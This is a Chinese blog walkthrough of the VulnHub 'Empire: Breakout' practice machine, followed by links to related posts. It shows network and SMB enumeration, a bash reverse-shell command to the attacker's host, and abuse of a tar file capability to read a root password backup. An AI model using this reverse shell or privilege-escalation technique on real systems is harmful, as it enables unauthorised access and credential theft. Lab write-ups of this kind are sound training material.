vulnhub-Empire-Breakout writeup

最新推荐文章于 2024-09-24 13:45:00 发布
最新推荐文章于 2024-09-24 13:45:00 发布
阅读量222 收藏
点赞数 2
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329729
版权

Empire-Breakout渗透过程(kali IP:192.168.39.128 靶机IP:192.168.39.130)

**一.信息收集**
nmap -sP 192.168.39.0/24
nmap -sV -p- 192.168.39.130
dirsearch 192.168.39.130
收集信息:开放端口80,20000,10000,445,139  中间件:apache 2.4.51 查看主页面源代码发现一个加密密码,解密为   .2uqPEfj3D<P'a-3
enum4linux -a 192.168.39.130    //得到密码,要想办法得到用户名,因为开放smb服务所以用enun4linux扫描,扫到一个cyber用户,登录进去看看,寻找发现usermin里的login的command shell可以执行命令
bash -i >& /dev/tcp/192.168.39.128/8888 0>&1    //反弹shell
    

**二.提权**
ls -al    //发现tar有读权限
cat user.txt    //得到一个flag
getcap tar    //查看tar的能力,可以读取任意文件,则它的目的很可能是用tar去读取某个含有密码的文件
./tar -cvf test.tar /var/backups/.old_pass.bak    //寻找发现old_pass隐藏目录直接查看没有权限,先用tar压缩,再解压查看
./tar -xvf test.tar
ls
cat /var/backups/.old_pass.bak     //得到密码  Ts&4&YurgtRX(=~h
su root
cd /root
ls
cat r*    //得到flag

Jay-wings
关注
vulnhub-Empire: LupinOne
qq_43006864的博客
05-05 2240
Empire: LupinOne ~ VulnHub 靶机:EMPIRE: LUPINONE 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: 这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。 map -sS -sV -A -p- 192.168.1.109 目标网站: 22/80端口 r.
Vulnhub-Empire Breakout
m0_75236662的博客
07-26 551
这个盒子被创建为一个简单盒子,但如果你迷路了,它可以是中等的
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1106
小菜鸡一枚
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 815
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
Vulnhub-Empire靶机-详细打靶流程
woshicainiao666的博客
02-07 560
我有一剑,可搬山,,,,
VulnHub-Empire_ LupinOne靶机详细渗透过程
MRS_jianai的博客
12-28 1320
VulnHub-Empire: LupinOne靶机详细渗透过程
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 995
在Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3735
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
VulnHub靶场---Empire-Lupin-One
qq_61670993的博客
10-20 858
小菜鸡一枚
vms-empire:设置为BBS门的VMS-Empire版本-开源
04-29
在"vms-empire-master"这个压缩包中,"master"通常表示这是项目的主分支,包含了最新的稳定代码。用户可以解压这个文件,找到游戏的源代码、编译说明和其他相关文档。如果想在本地运行或修改VMS-Empire,可能需要...
khmer-empire
05-18
【压缩包子文件的文件名称列表】只给出了"khmer-empire-master",这通常是一个Git仓库的克隆或下载版本,其中“master”是Git的默认分支名。在GitHub等版本控制系统中,项目通常以这种方式打包下载。这个文件可能...
21002 - Empire State Building.mpd
06-10
21002 - Empire State Building
Vulnhub Empire Breakout
weixin_45682839的博客
08-05 643
VulnHub Empire系列靶场的第二个靶场Breakout学习记录攻略,设计的技术知识:brainfuck加解密、Enum4linux工具的使用、Linux提权
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全详解
weidl001的博客
09-21 1399
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-24 625
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全证书考取相关知识
aa98865646的博客
09-21 628
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值